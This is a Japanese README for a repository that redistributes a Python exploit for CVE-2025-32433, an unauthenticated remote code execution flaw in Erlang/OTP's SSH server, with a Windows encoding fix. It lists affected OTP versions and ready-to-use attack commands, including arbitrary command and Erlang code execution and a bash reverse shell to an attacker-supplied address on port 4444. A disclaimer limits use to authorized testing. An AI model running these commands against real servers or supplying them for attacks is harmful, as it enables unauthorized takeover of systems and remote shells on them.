
元のバージョンに基づく:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Windows互換性のためにUnicodeチェックマークをASCII文字に置き換える
Erlang/OTP SSH 認証なしリモートコード実行
このリポジトリには、Erlang/OTP SSHサーバーにおける致命的な認証なしリモートコード実行脆弱性であるCVE-2025-32433のエクスプロイトが含まれています。
主な特長:
CVE ID: CVE-2025-32433
重大度: 重大
影響: 認証なしリモートコード実行
この脆弱性により、攻撃者は特別に細工されたSSHプロトコルメッセージを送信することで、認証なしにErlang/OTP SSHサーバー上で任意のシステムコマンドを実行できます。
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 and older (likely)
# Basic command execution
python exploit.py -t <target-ip> -p 2222 -c "whoami"
# Execute system command
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"
# Raw Erlang code execution
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'
# Reverse shell
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
-t, --target Target IP address (default: 127.0.0.1)
-p, --port Target port (default: 2222)
-c, --command System command to execute
-e, --erlang Raw Erlang code to execute
このバージョンは、元のエクスプロイトに存在するエンコーディング問題を修正しています。
問題: 元のエクスプロイトはUnicodeのチェックマーク文字(✓、U+2713)を使用しており、WindowsでGBKエンコーディングエラーが発生します:
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence
解決策: Unicode文字を標準ASCIIの+文字に置き換え、クロスプラットフォーム互換性を実現しました。
このエクスプロイトは次の手順で動作します:
os:cmd()を介した任意のErlangコードの実行このエクスプロイトは、教育および許可されたセキュリティテストの目的でのみ提供されています。コンピュータシステムへの無許可アクセスは違法です。責任を持って、明示的なテスト許可を得たシステムでのみ使用してください。
MIT License
Windows互換性のためにchuzouXによって修正